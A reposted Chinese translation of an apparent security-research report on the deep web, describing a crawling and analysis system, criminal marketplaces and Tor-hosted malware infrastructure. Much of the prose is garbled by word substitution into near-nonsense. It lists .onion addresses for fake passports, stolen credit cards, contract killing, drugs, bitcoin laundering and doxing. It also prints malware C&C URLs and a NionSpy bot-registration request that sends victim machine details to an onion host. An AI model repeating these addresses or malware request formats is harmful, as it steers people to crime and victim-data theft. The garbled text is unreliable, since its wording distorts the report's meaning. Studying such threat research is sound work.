|
|
|
联系客服020-83701501

隐藏在地下的网络犯罪

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
暗藏在光明的网络立功

如下形式纯属捏造。

深网(Deep Web)覆盖的形式包罗万象,此中搜罗有动态网页,已屏蔽网站(需要你回答标题或填写验证码遏制拜访),小我私家网站(需要登录痛处技艺花色遏制拜访),非 HTML/contextual/script形式和受限拜访网络等等。但因为各种起因,Google等搜寻引擎无法索引到暗网的形式。

诸如.BIT域名这一类受限拜访的网站所注册的DNS(域名服务系统)根服务器不受ICANN(互联网称谓与数字地点调配机构)筹算。这些网站运行 在非尺度顶级域名的尺度DNS服务器之中。想要拜访这些光明网络(Darknets)需要经由Tor这种软件来遏制拜访。而这些光明网络活动是组成深网大 悉数配合的优点的根柢。

深网的用途

聪明人在网上购置大麻的时候是不会在普通浏览器输出这些缓慢的关键字的。于是,他需要一种不公开的IP地点和物理地点的匿名上彀方法遏制犯科活动。 同样的,大麻的卖家也不想在网上开店后被人查出具体职位地方。假定注册的域名或网站的IP地点是真实存在,那么很繁冗就会被查水表。

除了购置大麻的须要之外另有此外良多起因需要哄骗到匿名上彀。譬如:有人想要从政府的监控中跟外人遏制神秘通信,知情人想要向记者透露爆炸性动静但 不想披露各人的身份,某些政治制度惨酷的国家的差异政见人士想要安全地向全球见告他们国家正在产生甚么事变。这些起因都致使他们用到深网的匿名遵从。

另外,那些群众人物想密谋暗杀外人需要包管大家不会留下甚么尾巴。此外需要僵持匿名的犯科服务另有类似销售犯科护照和声誉卡。同样,那些要透露外人的私家静态的腼腆佬也要经由匿名的方法包管大家安全。

表网 VS 深网

探求深网的时候一个不得不说的观点便是“表网(Clear Web)”。它与深网彻底相当,或是被传统的搜寻引擎索引,可以经由无需任何特殊设置装备摆设的尺度Web浏览器浏览网络。这种称之为“可搜寻互联网(searchable 网络)”便是表网。

暗网 VS 深网

良多人误解暗网(Dark Web)与深网(Deep Web)两个观点,乃至一些研究人员把它们当成等价关连。可是!!暗网不是深网!!它仅仅只是深网的一悉数。暗网奉求于光明网络。在暗网,两者之间的通信 网络是受信的。Tor的“有形的互联网”项目(Invisible 网络 Project(I2P))便是一个暗网系统的例子。

0x01 深网解析器

深网解析器(DeWA)是为了追查歹意软件的作者,摸索新的歹意引诱,提取深网中有意义的数据,搜查新的歹意软件活动等目的而筹算的。

深网解析器包含五个悉数:

  1. 数据收集模块,负担负责从多个来历中搜寻和糊口新的URL。
  2. 通用网关,计划那些私家DNS地点,并应允用户像哄骗Tor和I2P这些软件同样去拜访暗藏的资源。
  3. 页面侦查模块,负担负责爬取新网址。
  4. 数据富集解析模块,整合此后外源的侦查静态。
  5. 存储索引模块,让数据未便进一步解析。
  6. 可视化解析工具。

System Overview

System Overview

数据解析模块

深网解析器的第一个模块是数据收集模块,数据收集模块经由上面的主站爬取新的URL:

  • TOR和I2P暗藏的服务主机
  • Freenet资源定位器
  • .bit域名
  • 非尺度TLD(顶级域名)的此外域名,从已知的代理域名注册商获得顶级域名列表

咱们的监测系统的数据基于:

  • 用户数据,搜查HTTP链接到暗藏的服务或非尺度域名
  • 类似Pastebin的网站,搜查文本中包含深网网址的片段
  • 群众论坛(reddit等一类网站),查找包含深网网址的帖子
  • 包含深网域名的网站,譬如deep网站links.com,darkspider.com等
  • TOR网关的统计静态,譬如tor2网站.org这种网站反对用户无需安插TOR即可以拜访暗藏的服务并统计每天的域名拜访静态
  • I2P剖析文件,作为一种加速I2P主机名剖析门径,它可以从一些埋伏的网站下载一些后来操办好的主机列表。咱们可以在这个列表找到一些诙谐的新域名
  • Twiter,从Twiter查找包含深网域名的URL

数据收集模块在发现新域名后天生数据索引,同时还对各个URL组件遏制流量解析。这些解析操作或是使咱们发现新的歹意软件活动。

通用深网网关

后背咱们已经提到过,深网的资源很难爬取。需要经由TOR和I2P这种专用软件代替DNS和TLD作为网络地点剖析工具。为了未便快速拜访深网的资源,咱们安顿了一个Charon(一个可以哄骗URL发送HTTP哀求到目的服务器的透明代理服务器)。

遵循URL的品种,Charon毗邻到:

  • TOR负载均衡器
  • I2P
  • Freenet节点
  • 或是剖析私家TLD的私家DNS服务器

页面窥探

关于每一个收集到的URL都要执行“窥探”操作。即尝试毗邻到URL并糊口响应的数据。当产生谬误的时候,窥探器糊口局部谬误静态供哄骗者查抄谬误是 由域名剖析,服务器端谬误或传输糜烂等起因组成的。HTTP哀求糜烂之后,窥探器会糊口全数HTTP头部,这个头部可以用来窥探歹意软件对应的主机。当 然,这种状况只是针对特定的HTTP哀求。

当腐烂的时候,窥探器哄骗无界面浏览器(Headless Browser)从下载上去的页面提取关系的静态:

  • 记载局部HTTP头,并追踪局部重定向链接。
  • 执行网页DOM衬着(为了获得动态javascript页面)
  • 获得网页的快照
  • 计算网页的大小和MD5
  • 提取网页的元数据:标题,标签,资源,关键字等等
  • 提取网页的文本形式
  • 提取网页局部链接
  • 收集网页中局部email地点
  • 提取URL并反馈给数据收集模块,往后作为附加数据源的索引。

数据富集

数据富集(Data Enrichment)由窥探的数据组成,针对每一个窥探腐烂的页面执行如下操作:

  • 检测页面的语言
  • 哄骗Google翻译局部非英文网页
  • 经由Web光华系统针对链接遏制评级分类
  • 哄骗语义聚类算法解析天生WordCloud

聚类算法天生的WordCloud就已经包含了紧张的静态。该算法的使命流程如下

  1. 记载页面上的特殊单词和每一个单词词频
  2. 筛选单词,只保留虚词,此外如动词,刻划词都去掉。虚词只保留双数形式
  3. 计算语义隔断矩阵:这个矩阵记载词与词互相之间的分类隔断。这个矩阵称之为WordNet矩阵。WordNet矩阵测量每一个单词的分类隔断。例 如,“棒球”和“篮球”的隔断就极端濒临,因为两者都属于“体育”。同样,“猫”和“狗”的隔断也很四周,因为它们凡是属于“动物”。而另一方面,“狗” 和“棒球”的隔断就很远了
  4. 词集的单词隔断由内向外增加。一旦咱们拥有每一个词对的隔断,即可以发现一组存在意义类似的单词组
  5. 词集哄骗的第一个词的字母轨范为标签标注,并计算词集合每一个单词的词频
  6. 哄骗词集外面分数前20名的标签,绘制天生WordCloud

数据富集模块让解析人员可以快速从一个网页之中得到主旨。

存储和索引

订阅的URL和窥探的静态都遵循差异尺度的索引方法糊口到Elasticsearch集群。窥探静态作为每一个网页文档的索引,并由 Elasticsearch供应搜寻遵从。这种关联关键字的方法经由文本盘诘就能搜寻不计其数的网页。每一个URL组件的URL静态也作为统计静态糊口起 来,它可以用于必定一个系统的主机名以及查抄这个URL的流路程度。此外用途另有:给定一个主机名和参数就能查抄它第一次拜访状况,或者找出哪些URL 拜访次数至多次等等。

UI和可视化

为了拜访和操作数据,咱们需要借助三个差异的前端系统:

  • 为了遏制定性解析,咱们斥地了一个深网门户网站。这个工具可以未便调查人员经由差异的方法搜寻深网的形式。咱们供应差异的可视化成效:一个网站分 类,它应允用户经由主机名,路径,字符串等方法浏览局部深网的URL。一个URL提纲视图,用于示意局部收集的URL。一个窥探提纲视图,供应一个零丁的 窥探网页用于搜寻网页形式。
  • 为了遏制定量解析,咱们奉求Kibana供应的前辈数据统计遵从和实时数据计算遵从。它供应了一个数据挖掘标签和可视化标签。可视化视图标签遵循差异的数据目的和聚合遏制绘制图表。
  • 关于更初级的数据检验,咱们哄骗了IPython Notebook。它含有丰富步调库,未便嵌入到Elasticsearch集群之中检验本地数据和编译详细的述说静态。

0x02 深网的状况

在本节之中,咱们将显露一些用咱们的系统收集到的深网应用途景。

首先先来看下在过来两年间收集到的局部现有深网网页的语言分布状况。

有两种门径可以遏制语言检测:一是哄骗Python的第三方guess_language模块,它基于Trigram算法实现,并反对离线哄骗。2 是哄骗Google翻译。在哄骗的时候需要比较两者的探测风致提防组成数据偏差。譬如,Google翻译有“未知语言(当网页不有数据的时候)”的观点。 并且默许状况下是哄骗英语。于是一个不慎就繁冗组成庞大的数据偏差。

下图示意网页语言的分布状况,在统计的时候咱们已颠末滤掉小于1KB的数据量的语言(因为数据量过小说不上话)。

可以看到深网网页次要以英文为主,在局部域名之中占到75%。第2是俄国,往后是法国(大要搜罗法国和加拿大)。

接上去咱们看一下过来两年间收集到的局部域名的URL挪用门径(HTTP,HTTPS,FTPR三0;)。HTTP(s)协定占到了22.000。假定过滤掉这些数据,可以看到如下图所示的诙谐数据:

跨越100个网站哄骗了IRC(S)协定。这些凡是正常的聊天服务器。诚然,它们也可以作为遏制违法刷新场或作为僵尸网络(Botnet)的通信渠道哄骗。同种榜样的另有运行在TOR的聊天服务器的7 XMPP(类似Jabber所哄骗的)域名。

一些深网立功活动的例子

深网外面供应极端好的翻译状况供人们交易商品或服务,并供应包管人们在交易时的匿名性。当然缺乏身份证的交易当然存在很大的陵犯,但同时也供应了相 对的安全性。这种方法使得深网网民可以沉着地销售交易犯科商品或服务。另外,差异于光明网络立功,深网大大都活动都对“真实天下”起侧远大的影响感化。

在这里咱们无法包管这些商品或服务的真实性,只针对性探求那些真实存在的网站广告。并且咱们无法覆盖局部产物和服务,在这里次要介绍几个紧张的交易榜样。

销售护照和国籍

即便是假的护照或身份证也是极端好用的证件。这些证件不仅单可以用于出国(搜罗买家不易出现交叉),也可以用于开设银行账户,恳求取款,购置房地 产等等。以是毫无疑难,护照和身份证凡是一种很有价值的商品。有几个深网网站都声称它们出售正式的护照和身份证,代价在差异国家和差异卖家之间也各不相 等。

这种服务很难包管说没人购置。出格是那些在异国本乡但护照身份证被骗/盗/迷失的报答了持续留在该国家大要就会购置这些犯科证件。

USA Citizenship for sale for under 6000 USD http://xfnwyig7olypdq5r.onion/

Pricing information and samples for fake passports and other documents http://fakeidigyiumbgpu.onion

参考:

  1. USA Citizenship
  2. UK Passports
  3. Fake Passports, many countries

盗卖帐号

盗卖帐号绝不仅限于深网,表网地底下这种榜样的交易也很常见。在过来咱们写了大批关于俄罗斯和中国这方面的述说。此中,声誉卡、银行账户,在线拍卖网站和游戏大假定最多见的盗卖帐号榜样。

表网上差异的网站之间代价也相差甚大。但冲弱的商品经常城市有一小我私家们普及承受的定价尺度。个熟习有两种售卖方法:高风致颠末已验证的帐号,但需要 供应懂得的帐号余额。大批未教育证的帐号,但需要包管至多一悉数无效。第一种销售方法成本当然高了一些,但大要带来更多的高风致的买家。而批发帐号售价会 绝对便宜一些。

Unverified accounts sold in bulk – 80% valid or replacement offered http://三dbr5t4pygahedms.onion/

可以发现深网出售的商品都能在表网找到对应的商品。以是说表网不是不有这种榜样论坛,只是深网上看起来逼格更高一些。

Replica credit cards created with stolen details http://ccccrckysxxm6avu.onion/

参考:

  1. http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-russianunderground-101.pdf
  2. http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-russianunderground-revisited.pdf
  3. http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-thechinese-underground-in-201三.pdf
  4. Stolen Paypal accounts
  5. Unverified stolen accounts
  6. Replica stolen credit cards

暗杀服务

这也是深网外面最暗中的服务之一,这种服务供应暗杀服务和杀手出租服务,假定放在表网上那绝对是愚笨至极。深网存在几个如许的服务供应商,并且在他 们网站也公开阐明他们是如何包管业务的机密性。一个网站懂得阐明:它们不供应杀手们过来的使命证明,以及以往的客户反馈状况和暗杀腐烂的证明。相似,他们哄骗比特币作为光华象征。结尾,只要当杀手展开暗杀并供应证明,技艺花色得到佣金。

C’thulu Resume – Assassination Services for Hire http://cthulhuuap7ch47k.onion

从上图可以看到,服务的代价随着目的的死亡方法,受伤方法和地位的差异而差异。近来,Ross Ulbricht就因把持丝绸之路遏制贩毒被判刑而筹算雇佣五个杀手干掉他的分伙人。

另有另外一种差异的服务,称之为“众包暗杀”。在DeadPool这个网站外面,用户提出潜在的暗杀目的,往后另外人向“死亡之池”扔比特币。暗杀者料想目的大要何时以甚么方法死亡。假定这小我私家的确死了,并且符合料想的结果,那么暗杀者就能得到这笔钱。至今为止已经提出了4个名字,然而还不有钱进入池中。咱们可以料想这是一个垂纶网站。

Deadpool – Crowd Sourced Assassination http://deadpool4x4a25ys.onion

参考:

  1. http://www.wired.com/2015/02/read-transcript-silk-roads-boss-ordering-5-assassinations/
  2. Contract Killers (C’thulu Resume)
  3. Crowdsourced assassination

比特币和洗钱

比特币(Bitcoin)大家是为了匿名士畅而筹算的货币。于是它屡屡哄骗在购置犯科商品或服务上面(诚然也可以购置不法的东西)。当然只要不把比 特币跟你的真实身份打上挂钩就能包管在交易的匿名性。可是,每笔比特币的交易凡是彻底公开的。以是,当然比较坚苦,调查人员追查资金的流畅状况仍是可行 的。

有一些服务可以前进你的货币在系统中的匿名性,使得这些货币流畅状况更难以追查。这些服务个体把你的货币在网络蜘蛛出息行微交易后再前往到你手上。在这个过程你会迷失大批货币(个体减去大量的手续费),但可以使得你的交易过程变得更加难以追查。

EasyCoin – Bitcoin laundery service http://easycoinsayj7p5l.onion

比特币洗钱服务可以前进资金在比特币系统流畅的匿名性。但人们最盼愿的仍是从系统从把比特币经由此外方法转换为现金。深网有转换现金的匿名服务:它们基础凡是经由Paypal,ACH,西联汇款或者直接发送邮件给你现金。

WeBuyBitcoins – Exchanging Bitcoin for cash or electronic payments http://jzn5w5pac26sqef4.onion

像WeBuyBitcoins这种网站在表网供应非匿名但绝对较高的汇率的交易。关于立功份子来讲大要原意禁受更大的陵犯得到更多的现金。另外另有一种抉择是:哄骗比特币购置假币。

Buying counterfeit 20 USD for approximately half the price of face value http://usjudr三c6ez6tesi.onion

参考:

  1. Bitcoin used to by a Tesla Model S
  2. EasyCoin – Bitcoin Wallet with free Bitcoin Mixer / Laundery
  3. OnionWallet – Bitcoin Wallet with free Bitcoin Mixer / Laundery
  4. WeBuyBitcoins – Sell Bitcoins for Cash (USD), ACH, WU/MG, LR, PayPal and others
  5. Counterfeit $20 USD / Euro Bills
  6. Counterfeit $50 Euro Bills
  7. Counterfeit $50 USD Bills

走漏政府,法律部分,法人的静态

黑客文明是一种一群气味相投的人组成的紧凑式或封密式的结构。因为这种本质,结构之间很繁冗产生协作争吵。产生争吵时“Dox”对方是一种常见的做 法,Dox是指经由计算机检索,黑客等举止把对方的小我私家静态发表到网络上。获得对方小我私家静态门径有良多,但个熟习结纳群众数据,社会工程学和黑客冲击几种 门径收集对方的小我私家静态。

Cloudnine Doxing site – note it requests SSN, medical & financial info and more http://cloudninetve7kme.onion

可是Dox景象不仅限于黑客之间,针对敌手公司,名流,群众人物的Dox也是很常见的。披露的静态也不仅限于黑客获得到的静态,也大假定外部人员透露的。个别状况下都把静态提交到维基解密(Wikileak)上。深网也有这种榜样的网站,应允提交这些静态。

很难包管这些静态的真实性。但经由走漏的静态搜罗:华诞,SSN,小我私家email地点,手机号码,栖身地点等等。Cloud Nine这个网站列出了一些大要“Dox”静态:

  • 几个FBI间谍
  • Bill,Hillary Clinton,Barack,Michelle Obama,Sarah Palin,美国商榷员另有此外一些政府人员。
  • Angelina Jolie,Bill Gates,Tom Cruise,Lady Gaga,Beyonce,Dennis Rodman等名流。

Apparent personal email account of Barack Obama (unverified) http://cloudninetve7kme.onion

Apparent leaks of LEA (unverified) http://cloudninetve7kme.onion

A leak for Kim Kardashian among other hacker related dox http://cloudninetve7kme.onion

参考:

  1. Doxing archive
  2. Wikileaks clone
  3. Wikileaks submission portal
  4. Possible Judge Forrest leak

病毒

正如后背提到过的,深网最多见的便是销售大麻和武器。但在这篇文章中咱们不筹算深入探究这些细节,因为已经有良多文章述说了深网销售病毒的事变。但 咱们想朴实的是,即便是运维“丝绸之路”销售大麻的Ross Ulbricht近来也被判无期徒刑。销售大麻关于本文解析深网的重量来讲真实不是很紧张。

深网外面销售的大麻榜样泛滥,有烟草,大麻,迷药,可卡因等等。

The Peoples Drug Store – selling Heroin, Cocaine, Ectasy and more http://newpdsuslmzqazvr.onion

Grams – the Deep网站s search engine for drug http://grams7enufi7jmdl.onion

除了特意的商店和探求外,另有一个极端受接待的网站“Grams”。网站风格有些类似Google,并且供应繁冗的搜寻引擎应允搜寻大麻。它在深网外面已经成为那些想购置大麻的人的旗帜性网站。

咱们乃至发现TOR外面有些网站还供应大麻的培植状况:现场的温度,水分,另有动物的生命周期。

Growhouse – showing temperature and live streaming of Cannabis plant http://growboxoo2uacpkh.onion

Drugs dealer in the Deep Web

咱们只以是要在这一节介绍深网外面的大麻述说是因为想朴实:就像丝绸之路同样,它会记载下你的立功举止。深网基础底细上真实不是一个好的计划规画。一方面 买家盼愿向你购置大麻,另一方面还需要有卖家供应货源。市场和论坛只是作为一个交易转接点,你假定不想哄骗它,那么只要商品的双方须要量够大,即时会有其 它市场伴随须要而诞生。

参考:

  1. http://www.forbes.com/sites/katevinton/2015/05/29/ulbricht-sentencing-silk-road/
  2. Contraband Tobacco
  3. Cannabis
  4. Psychedelics
  5. Heroin, Cocaine and others
  6. Grams – Deep Web drug search engine
  7. Live feed from a Cannabis Growhouse
  8. Expert Insight video Series – The Deep Web

歹意软件

深网和歹意软件之间在良多方面上或是完竣结纳在一路。出格是当哄骗深网作为C&C管教服务器根柢设施哄骗的时候或是把持TOR和I2P壮大 的加密遵从暗藏职位地方静态包管网站和服务的匿名性。这使得调查人员很难哄骗传统的方法搜查服务器IP地点和登录皮相称等。另外,这些网站和服务哄骗起来很简 单。以是无须吃惊为甚么那么多网络立功份子哄骗TOR作为C&C。个体歹意软件捆绑了TOR的客户端。这种趋势起头在201三年开始,事先 MEVADE歹意软件还组成了TOR流量剧增,2014年之后流行的是类ZBOT歹意软件家族。

举个例子,VAWTRAK歹意软件是一种经由垂纶邮件遏制荟萃的银行木马。每一个样本都哄骗C&C服务器供应的IP地点列表遏制通信,IP地 址列表向TOR主机网站下载(个体是一个icon文件,个别定名为favicon.ico)。这种方法的所长是包管立功服务器的匿名性。但这不是局部人都 能拜访,只要那些受到病毒感染的系统技艺花色拜访C&C服务器。

Vawtrak C&C showing the legitimate looking Favicon http://4bpthx5z4e7n6gnb.onion/favicon.ico

网站服务器经由favicon.ico文件设置装备摆设C&C管教服务器(大大都运行在openresty/1.7.2.1)。咱们可以经由搜寻这些网站的完整列表下载每天最新的C&C。

Example of fetched HTTP headers from C&Cs

Identified TOR-based C&Cs (1)

Identified TOR-based C&Cs (2)

另一个哄骗深网的歹意软件是CryptoLocker。CryptoLockeree是一款ransomware勒索软件的变种,它经由加密受害者 的小我私家文档和原料,并在受害者再次拜访的时候重定向到它的网站以到达勒索目的。CryptoLocker可以被动调解排解付款页面的语言和付出身手。TorrentLocker是CryptoLocker的变种,它哄骗TOR作为主机,并哄骗比特币作为付出方法。这就阐晓畅为甚么立功份子为甚么要哄骗深网作为根柢设施,因为它的确更加安全。上面的截图是深网解析器捕捉到的两种语言的付款页。

Cryptolocker C&C automatically formatted for a victim in Taiwan and Italy http://ndvgtf27xkhdvezr.onion

Breakdown by Victims and Countries

上面是一个无关歹意软件偷取机密静态的例子。在咱们的搜寻门径之中,咱们哄骗一个近来和最短的时间窗口作为盘诘字符串,如许咱们可以快点发现深网外面新的引诱。

在这个例子中,xu和xd两个参数在过来一周人气剧增。xu关联跨越1700个的字典值并组成2进制器械文件。进一步观察发现,xu哄骗 NionSpy偷取受权痛处(个体是网上银行等),往后收集键盘记载并发送到深网中。与此同时,xd用于注册感染新的僵尸网络。注册静态包含受害者凝滞名 和操作系统版本号,通信的参数类似上面的JSON字符串:

Default
1 [REDACTED]2xx.onion:80/si.php?xd={“f155”:”MACHINE IP”,”f4三36”:”MACHINE NAME”,”f70三5”:”5.9.1.1”,”f1121”:”windows”,”f646三”:””,”f2015”:”1”}

经由走漏出来的数据收集解析注册关系的静态,创立示意每天新增的受害者图表。

Automated Analysis on Prevalent Query-String Parameters

Number of new Infections (and Leaked data, in bytes) per day.

结尾值得一提的是:一款名为Dyre的木马将I2P作为C&C服务器的备份选项。正常状况下则哄骗表网的DGA。这个木马作为一个BHO的 MiTMs运行在浏览器的网上银行上。冲击者可以通事先门拜访受到感染的受害者银行门户。DeWA介绍这个歹意软件的时候说到:在过来的6个月间,受到 I2P感染的受害者的数量清楚明了增加。

Traffic to Dyre’s I2P infrastructure.

参考:

  1. http://blog.trendmicro.com/trendlabs-security-intelligence/the-mysterious-mevade-malware/
  2. http://blog.trendmicro.com/trendlabs-security-intelligence/defending-against-tor-using-malware-part-1/
  3. http://blog.trendmicro.com/trendlabs-security-intelligence/defending-against-tor-using-malware-part-2/
  4. http://blog.trendmicro.com/trendlabs-security-intelligence/steganography-and-malware-why-and-how/
  5. Vawtrak / Neverquest C&C
  6. Cryptolocker C&C
来自91RI的针砭箴规,这些东西看看就好,天网恢恢疏而不漏

关系文章:《咱们去暗网转了圈,太污了》

【via@左懒】 本文经受权转自乌云drops,未经原站受权,请勿转载!

数安新闻+更多

证书相关+更多